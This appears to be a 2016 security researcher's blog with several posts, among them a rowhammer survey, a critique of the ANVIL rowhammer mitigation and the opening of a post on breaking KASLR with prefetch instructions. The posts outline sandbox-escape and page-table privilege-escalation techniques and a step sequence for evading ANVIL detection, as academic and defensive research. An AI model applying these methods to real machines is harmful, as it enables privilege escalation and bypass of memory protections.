Monday, August 1, 2016

BlackHat 2016: The Wish list

This blog is no longer where my technical stuff is blogged. It is purely my private thoughts. My technical stuff is blogged here; https://cyber.wtf

I’ve been honered by being chosen to speak at black hat for the second year in a row. Beyond speaking I hope to meet lots of people and I also have a wish list of talks I want to see. I considered blogging this wish list, but then dropped it since most wouldn’t really care what I want to see. Then Enno blogged his wish list and I realized just how different his was from mine. Obviously our research interests are quite different. Any ways here it goes:

Wednesday 10:20 am: Capturing 0day exploits with perfectly placed hardware traps
I talked with Cody last year in extension to my talk about performance counters and obviously he has not been fooling around in the past year. With Performance Counters being used for defensive things, it is very likely a talk right up my alley. I shall miss Alex Ionescu’s talk to watch this one, so I must hope Alex does some great slides.

Wednesday 1:50 pm: xenpwn: breaking paravirtualized device
Felix Wilhelms master’s thesis on the subject was the best (by far) master thesis Ive read in information security the past 2 years. Also I met Felix at Hack-In-The-Box and he is an all-round interesting fellow. Consequently, this is up high on my list of talks to see ta Black Hat.

Wednesday 3:00 pm: Intra process memory protection for applications on arm and x86 leveraging the elf abi
This talk’s title sounds like something I’d consider home turf, but I have a gut feeling that it won’t be at all. Honestly, I have no clue, but I am intrigued.

Wednesday 3:00 pm: pwning your java messaging with deserialization vulnerabilities
I know I won’t see this talk, but I will recommend anybody interesting in Java to see it. I had the opportunity to have lunch with Matthias Kaiser at the RuhrSec conference and had great pleasure in picking his mind on this topic. For sure this talk will be worthwhile!

Wednesday 4:20 pm: Breaking kernel address space layout randomization kaslr with intel tsx
Now this smells like something I would’ve wanted to do myself. And I get an eerie sense that there might be more flesh on this bone and my blood hound nose tells me I should go take a look.

Wednesday 5:30: Side channel attacks on everyday applications
I have played, written and talked extensively on this topic and this talk is one that I almost certainly won’t miss.

Thursday 9:00 am: Pindemonium: a dbi based generic unpacker for windows executable
In a dark past I co-authored what was probably the first public generic unpacker for windows executables. And since I tend to like being in a nostalgic mood I think I’m going to check out how much the state of the art has moved since I was young.

Thursday 11:00 am: Analysis of the attack surface of windows 10 virtualization based security
Rafal Wojtczuk’s talk is likely to be one of the more hardcore talks at Black Hat this year and as a Windows 10 User I’d love to hear more about the attack surface of this platform, especially the virtualization part.

Thursday 5:00 pm: Using undocumented cpu behavior to see into kernel mode and break kaslr in the process
This talk I have to hear though I’d much rather not. The problem is that I’m given this talk and dislike hearing my own voice during talks. Should you choose to go I actually think we have some pretty decent content.

Thursday, June 16, 2016

You've not heard the last of me

What a month May was. First I had the opportunity to meet with some infosec people I havn't seen in a very long time and also met some people in the business that I’d not met before. Then I got selected to speak at Black Hat USA 2016. The second year in a row. This time co-presenting with Daniel Gruss - one of the protagonist in field I've been playing in the last year and a half. Further I had the opportunity to speak at Hack In The Box 2016 in Amsterdam on "Cache side channel attacks: CPU Design as a security problem" where again I met up with some wonderful and interesting people. As if that wasn't enough I got to co-author my first academic paper in a field I've been doing only as a hobby till now. It will be published soon I hope. Finally I left the company I've founded. I now work full time with InfoSec. It's not without a heavy heart that I leave the company I've helped build. I'm proud of the work I did there and I've been fortunate to work with such brilliant people. 

This transition will have consequences for my blogging. At present I cannot say how it will continue, but I think I can safely promise that you've not heard that last of me.



Anyways thanks must go out to all the people who have helped and encouraged me and of to those who spend their time reading this blog. 

Friday, May 6, 2016

Row hammer the short summary

Introduction
I resonantly realized how much stuff was published on the row hammer and how much I was missing a short summary. So I wrote one and you are now reading the result. The summary is moderately technical and is kept short with intend. I may or may not update this post – but please let me know if you think I missed something important. There will be no new results here.

Short version of how dram works.

Current DRAM comes in modules called DIMM’s. If you buy a modern memory module for your PC, you’re buying a DIMM. If you look at the DIMM most DIMMs will have chips on both sides. Each side of the DIMM is a rank. Each rank again consists of a number of banks. The banks are in the physical individual chips you can see. Inside a bank you’d find a two dimensional matrix of memory cells. There are 32k rows in the matrix and 16k or 512k cells per row.  Each cell stores one bit and consists of a transistor for control and a capacitor which stores charge to signify bit is equal to 1 and no charge when bit is equal to 0 (on some chips the encoding is reversed). Thus a row stores 8kb or 64kb of data depending on the exact kind of DRAM you have in front of you. When you read or write from/to DRAM an entire row is first read into a so called so called row buffer. This is because for reading automatically discharges the capacitor and since writes rarely rewrite the entire row. Reading a row into the row buffer is called activating the row. An active row is thus cached in the row buffer. If a row is already active, it is not reactivated on requests. Also to prevent the capacitors loose charge overtime they are refreshed regularly (typically every 64 ms) by activating the rows.


Row hammer introduction

This secton is based on [1] Kim et Al. where not otherwise noted.
When a row is activated a small effect is caused on the neighboring row due to so called cross talk effects. The effect can be caused by electromagnetic interference, so called conductive bridges where there is minor electric conductivity in dram modules where it shouldn’t be. And finally, so called hot-carrier-injection may play a role where an electron reaches sufficient kinetic energy where it leaks from the system or even permanently damage parts of the circuitry.  The net effect is a loss of charge in the DRAM cell which if large enough will cause a bit to flip.

Consequently, it’s possible to cause bits to flip in DRAM by reading or writing repeatedly and systematically from/to two rows in DRAM to (active the rows) bit flips can be introduced in rows up to 9 rows away from these two “aggressor rows”. The 9 rows are called victim rows. The most errors happen in the row immediately next to an aggressor row. Picking the aggressor rows so they bracket a victim row is called double sided row hammering and is far more efficient that normal row hammering. Using two adjacent rows to hammer surrounding rows is called amplified single sided hammering and can be useful in exploitation scenarios. If the victim rows are refreshed before enough cross talk can be generated no bit flips is incurred. As a rule of thumb the higher the frequency of row activation the higher the probability of flipping bits.

It has been shown that bits can be flipped in less than 9 milliseconds and typically requires around 128k row activations. [3] Seaborn & Dullien has reported bit flips with as little as 98k row activations.

The problem occurs primarily with RAM produced after 2010. In a sample of 129 RAM modules from 3 manufacturers over 80% where vulnerable. With all modules produced after 2012 being vulnerable.  [4] Lanteigne showed that DDR4 ram is vulnerable too with 8 out of 12 sampled DRAMs was subject to bit flips. Further this paper showed that certain patterns in the DRAM rows where more likely to cause bit flips. 


Physical addressing and finding banks and row

Obviously to cause row hammering one needs two addresses belonging to rows in the same bank. [2] showed that repeatedly choosing two random addresses in a large buffer would in a practical amount of time belong to the same bank and thus be useful for hammering in software.

An optimal solution requires that the attacker has knowledge of physical addresses. Even with a physical address an attacker would need to know how they map to dimm, banks and rows to optimally row hammer. [5] Seaborn used row hammer itself to derive the complex function that determines physical address to dram location for a sandy bridge computer. [6] Pessl et al. showed how to use “row buffer side channel attacks” to derive the complex addressing function generically and provided maps for many modern intel CPU’s.

To obtain physical addresses the /proc/$PID/pagemap could provide this information. However, /proc/$PID/pagemap, which is not available in all operating systems and no longer affords unpriviledged access in most operating systems that do support it. This problem for an attacker remains to be definitively solved.


Row hammering with software

To cause row hammer from software you need to activate memory rows, that is cause reads or writes to physical memory. However modern processors are equipped with caches, so that they don’t incur serious speed penalties when memory is read or written. Thus to cause row hammering bit flips it’s required to bypass the caches.

 [1] did this using the clflush instruction that removes a particular address from the cache causing the next read of the address to go directly to memory. This approach has two down sides. First, since clflush is a rare instruction, validator sandboxes (such as NaCL of google chrome) can ban this instruction and thus defeat this attack. Second Just-in-time compilers and existing code on computers generally do not use this opcode disabling attack scenarios where jit compilers are used (such as javascript) or for the future using existing code in data-only attacks.

 [7] Aweke posted on a forum he was able to flip bits without clflush – he did not say how, but it was likely using the same method as [8] which systematically accessed memory in a pattern that causes the processor to evict the address of the attacker row from the cache causing the next read to go to physical memory. Unfortunately, how to evict caches is CPU dependent and undocumented and despite [8] Gruss, Maurice & Mangard mapping out how to optimally evict on most modern CPU’s it’s not the most trivial process. Typically, this requires knowledge of the physical address discussed above as well as a complex mapping function for cache sets. It is however possible to approximate this either through using large pages or through timing side channels. Also it is slower and thus less efficient than the clflush version above. Since this vector does not require special instructions, it’s applicable to native code (including sandboxed code), java script and potentially other JIT compiled languages.

[9] Qiao & Seaborn found out that the movnti instruction is capable of by passing the caches on it’s own. Further this instruction is commonly used – including as memcpy/memset in common libraries and thus difficult to ban in validator sandboxes and lowers the burden for  future row hammer as a code reuse attack. It remains to be seen if JIT compiled languages can make use of it.

Finally, [10] Fogh showed that the policies that maintains the coherency of multiple caches on the CPU can be used to cause row activations and speculated it would be fast enough for row hammering. Since the coherency policies are subject to much less change than cache eviction policies and does not require any special instructions this method may solve problems with the other methods should it be fast enough. This remain to be researched.


Exploiting row hammer

 [2] showed that row hammer could be used to break out of the NaCL chrome sandbox. The NaCL sandbox protects itself against by verifying all code paths before execution and block the use of undesired activities. To avoid new unintended code paths to be executed the sandbox enforces a 32 bit aligned address for relative jumps and adding a base address. In code it looks like this:
and rax, ~31
add rax, r15  //(base address of sandbox)
jmp rax
Bit flips in these instructions often cause other registers to be used and thus bypass the sandbox enforcing limits on relative jumps. By spraying code like the above then row hammer, check for usable bit flips and finally use one of these relative jumps to execute a not validated code path and thus exit the sandbox. Not validated code path can be entered through code reuse style gadgets.

The second and more serious privilege escalation attack demonstrated by [2] was from ring 3 user privileges to ring 0. Since adjacent physical addresses has a tendency to be used at the same time, CPU vendors map adjacent physical addresses to different parts of RAM as this offers the possibility of memory request being handled by DRAM in parallel. This has the effect that banks are often shared between different software across trust boundaries. This allows an attacker to flip bits in page table entries (PTE). PTE’s is central in the security on x86 and controls access writes to memory as well as mapping between virtual and physical addresses.  By repeatedly memory mapping a file many new PTE’s are generated. Then the attacker use row hammer to cause bit flips in the PTE’s.  The attacker hopes that a bit flips so that a PTE with write privileges maps to a new physical address where another PTE is located. By strategically modifying this second PTE the attacker has read & write access to the entire memory.

It is likely that row hammer can be exploited in other ways.


Row hammer mitigation

Most hardware mitigations suggest focuses on refreshing victim rows thus leaving less time for row hammer to do it’s work. Unfortunately, during the refresh ram is unable to respond to requests from the CPU and thus it comes at a performance penalty.
The simplest suggestion is increase the refresh rate for all ram. Much hardware support this already for high-temperatures. Usually the refresh rate is doubled, however to perfectly rule out row one would need to increase the refresh rate more than 7 fold [1]. Which in term is a steep performance penalty and a power consumption issue.

TTR [17] is a method that keeps track of used rows and cause targeted refresh of neighbors to minimize the penalty. The method needs to be supported in both CPU as well as RAM modules. MAC also known as maximum activation count keeps tracks of how many times a given row was activated. pTTR does this only statistically and thus cheaper to build into hardware. PARA [1] is another suggested hardware mitigation to statistically refresh victim rows. ARMOR [16] a solution that keep tracks of row activation in the memory interface.

It has been suggested that ECC ram can be used as a mitigation. Unfortunately, ECC ram will not to detect or correct bit flips in all instances where there are multiple bit flips in a row. Thus this leaves room for an attack to be successful even with ECC ram. Also ECC ram may cause the attacked system to reset, turning row hammer into a Denial of Service attack. [4] Suggests this problem persists in real life experiments.

Nishat Herath and I suggested using the LLC miss performance counter to detect row hammering here [11] Fogh & Nishat. LLC Misses are rare in real usage, but abundant in row hammering scenarios. [12] Gruss et al. ,[13] Payer refined the method respectively with correcting for generally activity in the memory subsystem. The methods are likely to present false positives in some cases and [11] and [13] therefore suggested only slowing down offenders to prevent bit flips. [14] Aweke et al. presented a method that first detected row hammering as above, then verified using PEBS performance monitoring, which has the advantage of delivering an address related to a cache miss and thus grants the ability to selectively read neighbor rows and thus doing targeted row refresh in a software implementation. [15] Fogh speculated that this method could be effectively bypassed by an attacker.

Litterature
[1] Yoongu Kim, R. Daly, J. Kim, C. Fallin, Ji Hye Lee, Donghyuk Lee, C. Wilkerson, K. Lai, and O. Mutlu. Flipping Bits in Memory Without Accessing Them: An Experimental Study of DRAM Disturbance Errors. In Computer Architecture (ISCA), 2014 ACM/IEEE 41st International Symposium on, pages 361--372, June 2014.
[2] Mark Seaborn and Thomas Dullien. Exploiting the DRAM rowhammer bug to gain kernel privileges. March 2015.
[3] Mark Seaborn and Thomas Dullien. “Exploiting the DRAM rowhammer bug to gain kernel privileges”. https://www.blackhat.com/docs/us-15/materials/us-15-Seaborn-Exploiting-The-DRAM-Rowhammer-Bug-To-Gain-Kernel-Privileges.pdf
[4] Mark Lanteigne. "How Rowhammer Could Be Used to Exploit Weaknesses in Computer Hardware
". Third  I/O. http://www.thirdio.com/rowhammer.pdf
[5] Mark Seaborn.” How physical addresses map to rows and banks in DRAM”; 
[6] Peter Pessl, Daniel Gruss, Clémentine Maurice, Michael Schwarz, Stefan Mangard: „Reverse Engineering Intel DRAM Addressing and Exploitation“
[7] Zelalem Birhanu Aweke, “Rowhammer without CLFLUSH,” https://groups.google.com/forum/#!topic/rowhammer-discuss/ojgTgLr4q M, May 2015, retrieved on July 16, 2015.
[8] Daniel Gruss, Clémentine Maurice, Stefan Mangard: “Rowhammer.js: A Remote Software-Induced Fault Attack in JavaScript”
[9] Rui Qiao, Mark Seaborn: “A New Approach for Rowhammer Attacks”. http://seclab.cs.sunysb.edu/seclab/pubs/host16.pdf
[10] Anders Fogh: “Row hammer, java script and MESI” http://dreamsofastone.blogspot.de/2016/02/row-hammer-java-script-and-mesi.html
[11] Anders Fogh, Nishat Herath. “These Are Not Your Grand Daddys CPU Performance Counters”. Black Hat 2015. http://dreamsofastone.blogspot.de/2015/08/speaking-at-black-hat.html
[12] Daniel Gruss, Clémentine Maurice, Klaus Wagner, Stefan Mangard: “Flush+Flush: A Fast and Stealthy Cache Attack”
[13] Mathias Payer: “HexPADS: a platform to detect “stealth” attacks“. https://nebelwelt.net/publications/files/16ESSoS.pdf
[14] Zelalem Birhanu Aweke, Salessawi Ferede Yitbarek, Rui Qiao, Reetuparna Das, Matthew Hicks, Yossi Oren, Todd Austin:”ANVIL: Software-Based Protection Against Next-Generation Rowhammer Attacks”
[15] Anders Fogh: “Anvil & Next generation row hammer attacks”. http://dreamsofastone.blogspot.de/2016/03/anvil-next-generation-row-hammer-attacks.html
[16] http://apt.cs.manchester.ac.uk/projects/ARMOR/RowHammer/armor.html


Wednesday, March 9, 2016

Anvil& next generation row hammer attacks

My ramblings

No technical stuff in here. If you are here for the tech skip to introduction.

First up the KASRL blog part 2 is in progress. It might take a while because there is a bit more meat on that bone than I’d expected and I want to do it right. But for now I hope you’ll enjoy this more speculative row hammer related post.

My all time favorite paper is [1]“Factors affecting voluntary alcohol consumption in the albino rat” by Kalervo Eriksson. I havn’t read it. But everything about the title fascinates me. Why Albino rats? What factors? Why does it intrigue me? Alcoholic rats? Binge drinking or occasional relaxation? Beer or whiskey? What is a albino rat hangover like? And most of all what was the motivation of the author? I shall not know anytime soon because I enjoy pondering these questions too much.

 The second on my list is one I’ve actually read. [2][“Leassons from the Bell Curve” by James Heckman. I know James Heckman’s stuff pretty well because I spend a few years studying micro-econometrics and he is an amazing econometrician and was awarded nobel prize for his work in this area. But this paper stood out to me. It’s not on economics (at least directly). It was not a particular original paper, since it took it’s base in a controversial book. The book, “The bell curve”, was  about the influence and distribution of intelligence. The critic this book received (and it was a lot) was mostly politically correct dissent that did not engage with the evidence based research presented in the book. Heckman took the same data, and systematically took it apart with state-of-the-art econometric methods dismissing some conclusions, confirming others with no regard to the political correctness of his results. It is in my mind too rare that this kind of papers is published yet it is very much at the core of science to check the robustness of other people’s results, to apply new methods to old data. And that paper is the inspiration for me when I in this blog critic other people’s work.

Introduction

The subject of this blog post is a paper by [1] Aweke et al. called “ANVIL: Software-Based Protection Against Next-Generation Rowhammer Attacks”. (it can be found here: http://iss.oy.ne.ro/) In it they first develop a cache eviction based row hammer attack to supplement the classic clflush – much along the lines of the rowhammer.js attack.  Then they developed a mitigation method for the row hammer attack and I’ll spend some time looking into their work below. They test this method against the classic row hammer attack using clflush and the cache eviction based attack. In this blog post I’ll first shortly summarize the paper, then comment on it and finally look into how the mitigation may be bypassed by next generation row hammer attacks. I shall not develop these next generation attacks in full, so it is somewhat speculative if they would actually work, but I hope to point fingers in directions where row hammer could go in response to mitigations such as the one in this paper. There are a number of reasons for this. First is that I don’t actually have access to their mitigation and thus cannot test against it. Secondly, I have to borrow a computer to flip bits as mine and my wife both do not seem to get bit flips when row hammering. Third is that I am somewhat reluctant to fully develop new attacks for which there currently is no protection. Finally and most importantly I’m a blogger and I’m doing this stuff after hours between all my other hobbies and obligations – it’s simply not within my time budget .

Despite of any critique in here I should make it very clear beforehand that I really like the paper and think it is an important contribution. If it wasn’t I wouldn’t spend time on it. The method certainly passes the litmus test of raising attacker cost and we must always remember that perfection is the enemy of good. Unfortunately this blog post turned out a bit more technical than I would’ve liked it to. To really engage with this blog post you need some knowledge of row hammer, performance counters and the cache subsystem.. Regular readers of my blog should be ok.


Ultra short summary of the Anvil paper

The papers results are:
1.    Bit flips can be caused in 15ms.
2.    Because of 1, The suggested mitigation of increasing the refresh rate on D-Ram from a refresh every 64ms to one every 32ms is not a sufficient protection.
3.    Row hammer can be done with out clflush. [5]Seaborn & Dullien suggested limiting access to clflush to kernel mode and google removed support for the clflush instruction in the NaCL sandbox. The authors show that this is not a viable solution because one cause cache evict and thereby bypass the cache to  access physical memory fast enough to cause row hammering.
4.    Then they go on to develop a software mitigation: Anvil. Anvil works in 3 stages:
a.    Stage 1: Using the fact that high rates of cache misses in the last level cache are rare on modern computers they use the LLC Cache miss performance counter as a first check if an attacker is row hammering. If LLC Cache misses exceeds a threshold per time unit Anvil continues to the second phase, if not it just continues monitoring. In addition to monitoring LLC Cache misses, it also monitors the amount of MEM_LOAD_UOPS_RETIRED_LLC_MISS this value gets used in the second stage.
b.    Stage 2: In the second stage Anvil uses the PEBS performance events to sample loads and/or stores. These performance counters can samples load/stores above a given latency. The authors set this latency to match that of a cache miss. The advantage of using these performance counters is that they provide the load/store address. This allows the authors to identify if the same rows are being used again and again or if the access pattern is all across memory and thus benign. If it’s not benign they proceed to stage 3. To cut down on overhead of sampling stores with PEBS they only sample stores if the MEM_LOAD_UOPS_RETIRED_LLC_MISS counter from the first stage was significant smaller than the LLC misses. The thought here is if they are seeing only loads in the first stage a potential attack is not driven by stores.
c.    State 3: Anvil has at this point detected a row hammer attack and will now thwart it. Because reading a row will automatically refresh it, Anvil uses the addresses found in the second stage to figure out which rows are being hammered and then issues a read to neighboring rows.
5.    The analysis of Anvil finds that it’s comes at a low performance cost. That the first stage is cheap performance wise and that it’s rare that Anvil proceeds to stage 2.



The short commentary

Regular readers of this blog cannot be surprised about most of what is found in the Anvil paper.

1.    The 15ms the authors take to cause a bitflip seems to be a bit high. [4] Yoongu  et al. states that a refresh rate below 8.2ms is required to entirely kill row hammering, which again suggests that bit flips under “favorable” circumstances can be caused significantly faster.
2.     It follows logically from 1 that lowering the refresh rate to 32ms does not completely deal with row hammer. Nishat Herath of Qualys and I pointed this out at Black hat and our slides and further comments can be found in my “Speaking at black hat” post..
3.     That bit flips can be caused without CLFLush is also not a surprise. It confirms [6] Gruss, Maurice & Mangard, which went a step further and generated optimal cache eviction strategies and implemented a java based attack.
4.     Anvil:
a.    Stage 1: This is exactly the same approach that I took in my first two blog posts on row hammer detection and mitigation which formed the basis for Nishat and my talk at Black hat. All come to the result that there is a high correlation between this perf counter and row hammer  [7] Gruss,Maurice&Wagner took it one step further and adjusted for over all memory activity and they too got pretty good results. I noticed false positives in my work with this method and this result is reproduced by the Anvil authors.
b.    Stage 2: Here we have the first big new contribution of the paper and it’s a great one. It certainly opens up new ways to think about cache attack detection and mitigations. It is a natural connection between cache misses and actual row hammer because you get addresses. I shall examine this method in more details below.
c.    Stage 3: The method of mitigation by reading neighboring rows was suggested by Nishat and myself at at our black hat talk. We only confirmed that reading victim rows would protect against row hammer, but we didn’t actually use this in our mitigation work and instead suggested causing a slow down when too many cache misses occurred. The reason is that we saw no good ways of actually inspecting which addresses where being used. I must honestly say that I missed the PEBS while designing this mitigation and found no good way of connecting a cache miss to an address. I shall analyze below to what extend Anvil succeeds at this. We suggested the slow down as a “soft response” in light of rare false positives in a.

5.    The analysis of the performance penalty of Anvil relatively closely follows the results I had testing our mitigation system from black hat. I used an entirely different set of test applications and came to the same conclusions. Thus I can confirm that Anvil is likely to have a very low performance impact, that should be acceptable for most systems. The first stage is nearly free and benign applications that get miss detected in the first stage are rare. I should note here that the Aweke  et  al. use h264ref to test Anvil and find that this video encoder rarely triggers the first stage. However h264ref is not representative of video encoders for multiple reasons. I had in my testing problems with a h264 video encoder (that I’ve coauthored) generating too many cache misses a great many times. The h264ref is written to be portable and easily understood. Production video encoders are much more streamlined in their memory access and particularly the heavy use of streaming instructions makes actual memory speed the limiting factor in many operations – especially motion search. Modern video encoders also utilizes threading much more and that puts the L3 cache under much more pressure than the h264ref will do. Also to evaluate a video encoders impact on memory access it’s important to use the right input material – this is because video encoders tend to shortcut additional calculation if it finds something it estimates to be “good enough” ´. Never-the-less this is probably mostly a personal comment – the authors conclusions generally match my results.2.



Anvil and future row hammer attacks


Aweke et al. conclude: “We feel that these results show it is viable to protect current and future systems against row hammer attacks”. As always it’s hard to tell what’s in the future, but my understanding of next-generation attacks is that they adapt to mitigation methods. In this section I shall outline what I think are weaknesses in Anvil that attacks could exploit in the future.  Unfortunately I end up being  a lot more pessimistic.  Even if the authors are right I’ll still prefer a hardware solution such as pTTR or PARA. The reason for this is that I’m a strong believer of fixing problems at their root cause. The cause of row hammer is a micro architectural problem and it should be fixed in micro architecture. Also we should consider that D-Ram is used in other devices than modern x86 computers. That said until we see such a solution, software might be the only solution and Anvil or other solutions certainly are options to fill the void.

My first source of pessimism is my work on the cache-coherency way of activating rows. I havn’t actually tested but I think it may bypass LLC cache miss counter as the entry for hammering never actually leaves the cache. See my blog post on MESI and rowhammer for more details.I Now I don’t know if that method is fast enough for row hammer but if it is it may affect all suggested software solutions thus far, because all three hinge on the LLC_MISS counter. Should this attack actually be fast enough and should it indeed avoid LLC cache misses, it is probably not a fatal problem. There are performance counters that cover this kind of stuff and it’s a rare event in benign software and thus we should be able to work around it. And they could be implemented as a parallel option in stage 1 of Anvil.

Aweke et al. suggest using a 6ms sampling for stage 1 and a 6ms sampling for stage 2. This means they spend 12ms detecting an attack before they respond. With [4] suggesting that a refresh rate of 8.2 ms is required to rule out row hammer attacks this might actually give an attacker enough time to flip a bit. Aweke et al. suggest that 110k activations is required to cause bit flips, if we multiply these numbers by the 55ns activation interval reported by [4] we end up with a lower bound on row hammering of only ~6ms. However the authors also evaluate a version of Anvil with 2ms intervals and conclude this version would work as well, despite slightly more overhead. They call it Anvil-heavy It would seem that Anvil-Heavy is the more relevant version of Anvil if the row hammer mitigation is supposed to be “perfect”. It is conceivable that the crosstalk effects behind row hammer will become more serious with time as memory gets denser and faster. How much wiggle room Anvil has to compensate beyond Anvil-Heavy is in my opinion an open question the two factors being how much over head lowering the intervals below 2 ms will cause through false prediction in stage 1 and for more sampling in stage 2 but also the shorter sampling interval in stage 2 can only be shorted so much before insufficient samples are collected to determine row locality of the hits. All this said I think the article underestimates the performance cost of a truly secure implementation, but they might still be acceptable.

It should be noted there is a good chance an attacker can gain a bit of introspection into Anvil. My guess is that if the attacker monitors latency in (say) a classic clflush row hammer attack he’ll be able to see when Anvil switches to the second stage. The argumentation is that sampling with PEBS causes latency on the instructions being sampled – typically interrupting the process would be in the order of magnitude of 4000 CLK’s including only rudimentary handling – that is much less than Anvil actually has to do. There is a reason Aweke et. al sees performance penalties in the second stage. It is important to note that with latencies in this order of magnitude anomalies can be detected by the attacker at very little cost, thus hardly disturbing the attack itself.

An example of how this could be used to bypass Anvil hinges on an implementation detail. Anvil does not sample store operations in the 2nd stage if store operations where rare in the first stage. This leaves room for an attacker to switch from a load based attack to a store based attack methodology mid attack and thus outwit stage 2. This again isn’t a fatal flaw by any means and can be worked around by simply always sampling stores – and the overhead should be acceptable given that it’s rare in real life that the 2nd stage even engages. But again the paper is probably underestimating the performance cost required for “perfect protection”.  However I don’t think this example is the real issue. The issue is that an attacker can adapt to the defense.

The last issue with Anvil that I’ll cover in this blog post is that Anvil assumes that a high latency instruction has high latency because of loads and stores it does. While this holds true for traditional attacks, this is not a given. The cache subsystem and the hardware prefetchers are examples of off core subsystems where access directly to D-Ram can originate without being part of loads and store initiated by an instruction in the core. Here is an example of how PEBS can be tricked. I’ll keep it simple by only accessing memory from one row, but it should be clear how a second row could be added to do row hammering.
  1. 1.    Let A be a cache set aligned address to an aggressor row
  2. 2.    Let E be an eviction set for A. E consist of E1..EN where N is the number of ways and E1..EN is not in the same dram bank as A
  3. 3.    Prime A’s cache set with E.
  4. 4.    Use clflush to remove a way from of E thus creating a way in the set marked as Invalid
  5. 5.    Use a store operation (mov [A],1) to set the invalid cache way to Modified, containing A.
  6. 6.    Now Evict A using E causing a writeback of A.
  7. 7.    Repeat from 4.


As for 2. This is easily done – there are plenty of addresses belonging E besides A to pick from. 3. This is standard stuff. 4. We may get high latency here but even if clflush is a store operation (which it may or may not be) it will not use A and thus an irrelevant address will be stored by PEBS – also the latency for a clflush is around 115 CLK’s (on my wife’s Sandy Bridge), significantly below that of a cache miss. Further it might not actually be needed. 5. A 4 byte store operation does not load the rest of the cache line from D-RAM (at least on my wife’s Sandy Bridge), thus the latency is low and will not be recorded by Anvil’s PEBS. 6. We do get latency here but we’ll  cause a write back for A, but PEBS will record E which is irrelevant. Such a scheme may be too slow for actual row hammering, but I don’t think it is. After all the normal eviction based attack is 70% faster than the requirement of 110k activations in a 64ms refresh interval according to [3]. Even if this turns out to be to slow for row hammering, it demonstrates that the second stage of Anvil may have severe deficits. 
Finally we can use the classic clflush method during the 1st phase of Anvil as noted above.

I can come up with other scenarios where this (and in some cases the other) software row hammer mitigation may fail, but I think I’ve placed enough on the table for this blog post.



Conclusion


The current implementation of Anvil is a low overhead row hammer mitigation which will work well against attacks that is not engineered to bypass it. Should Anvil become widespread it is likely that next generation methods of row hammering exists that are capable of bypassing the second stage of Anvil row hammer. Thus if I were to choose a method for row hammer mitigation on a mission critical system I would go with suggestion made by [7]  triggering a simple slow down in event of a detection. It has the benefits of thwarting some cache side channel attacks in the process. While this has a much higher performance penalty on a few applications, it’ll run at the same performance cost as Anvil in most real world scenarios and it’s simplicity offers less attack surface for engineered attacks.


Literature

[1] Kalervo Eriksson,”Factors affecting voluntary alcohol consumption in the albino rat”; Annales Zoologici Fennici; Vol. 6, No. 3 (1969), pp. 227-265
[2] Heckman, JamesJ.: “Lessons from the Bell Curve”,Journal of Political Economy, Vol. 103, No. 5 (Oct., 1995), pp. 1091-1120
[3] Zelalem Birhanu Aweke, Salessawi Ferede Yitbarek, Rui Qiao, Reetuparna Das, Matthew Hicks, Yossi Oren, Todd Austin:”ANVIL: Software-Based Protection Against Next-Generation Rowhammer Attacks”
 [4] Yoongu Kim, R. Daly, J. Kim, C. Fallin, Ji Hye Lee,Donghyuk Lee, C. Wilkerson, K. Lai, and O. Mutlu. Flipping Bits in Memory Without Accessing Them: An Experimental Study of DRAM Disturbance Errors. In Computer Architecture (ISCA), 2014 ACM/IEEE 41st International Symposium on, pages 361–372, June 2014.44 4
[5] Mark Seaborn and Thomas Dullien. Exploiting the DRAM rowhammer bug to gain kernel privileges. March 2015
[6] D. Gruss, C. Maurice, and S. Mangard.” Rowhammer.js: A Remote Software-Induced Fault Attack in JavaScript.” ArXiv e-prints, July 2015.

[7] Gruss, Maurice and Wagner: “Flush+Flush: A Stealthier Last-Level Cache Attack” http://arxiv.org/abs/1511.04594

Saturday, February 20, 2016

Breaking KASRL with micro architecture Part 1


Hack in the box & stuff

Skip to Introduction if you are here for the techstuff. I submitted a CFP to “Hack In the Box” in Amsterdam end of may and the talk has been accepted. So I’ll be spending part of my vacation this year presenting some of my research on cache side channel attacks from the last year or so. I’m really excited because I think I actually have some really nice stuff to present – not only is it technically interesting but I think it’s far more relevant that the common perception in the infosec community.  If you have a chance I think it’ll be worth while going. Amongst those who is going to present is Jacob Torrey whose material I covered twice on my blog and who in my opinion really is one of those who is pushing the boundaries of info sec. Also Felix Wilhelm is going and I currently have his master thesis on my night table and thus far it is indeed very cool reading.

Preparing a talk obviously takes a lot of time and since I’m an amateur this is going to cut down on the time I can spend on this blog. I have two more posts in the pipeline (including part 2 of this post), but no idea when I can get them done really.

Finally posting this blog post has been a big dilemma for me. I had the basic idea almost a year ago and I’ve been putting it off again and again because it’s offensive and posting it is a moral borderline case for me. I decided to go ahead but with a heavy heart. Also I have a heavy heart because when I started this blog I wanted to target the ambitious newbie. However there has been a tendency that my work has become progressively less accessible and this particular post is probably the least accessible thus far.

Introduction


KASRL means “kernel address space randomized layout”. It is a feature of most modern operating systems meant to protect against privilege escalation attacks that utilize code reuse attacks such as ROP (return oriented programming). The idea is that if an attacker doesn’t know where the code is, he cannot setup a ROP chain to reuse the code. Therefore a modern operating system load driver on different addresses on each boot and this leaves an attacker in the dark about where the code is located. Code reuse attacks has grown in importance for privilege escalations attacks with requirements for driver signing and wide spread use of “no-execute” settings on stack and other data in kernel mode, thus forcing the attacker to either bypass driver signing to load a driver, attack page tables or reuse existing code.

The attacker has typically relied on information leaks in known drivers that give away addresses that can be used to locate code. However last year I had an idea how we might use the CPU design for our information leak and this will be the topic of this blog post. That we can use CPU design against KARSL is particularly bad news because CPU’s are not subject to updates as software are and in the past intel has not been forthcoming with security fixes in this respect. Also relying on CPU for an attack means that mean thing generalizes across operating systems – this means many of the findings I’ve made here for Windows 7 will lend themselves to other platforms. On the other hand these kind of attacks may be applicable only on a subset of CPU’s. I think that all modern Intel CPU with a 3rd level cache i3,i5,i7 and xeons from Sandy Bridge and up is likely to be affected and possibly other CPU’s as well.

Finally I’d like to say these kind of attacks has been made before but I’m not aware of any with the same methodology as mine.

Finding drivers

The idea evolved around the “Prefetch” instructions. These instructions are meant for software to give the prefetcher a hint to load a specific address into a certain cache level because the software will need it shortly. This can be used to significantly improve performance as the prefetcher runs independent of the CPU and thus memory is fetched before it’ll be used. There is however a interesting thing with the prefetch instructions that caught my eye: They don’t cause exceptions (except they are incompatible with a lock prefix)[2] Intel. However they take a virtual address as input and will need a physical address for loading memory and placing it in the cache. Thus they may entirely by pass memory protection mechanisms further that seem relatively plausible because since they aren’t actually reading data they should not in any way or fashion allow an attacker to read memory he isn’t supposed to. Consequently intel might have decided that there wasn’t a security issue.

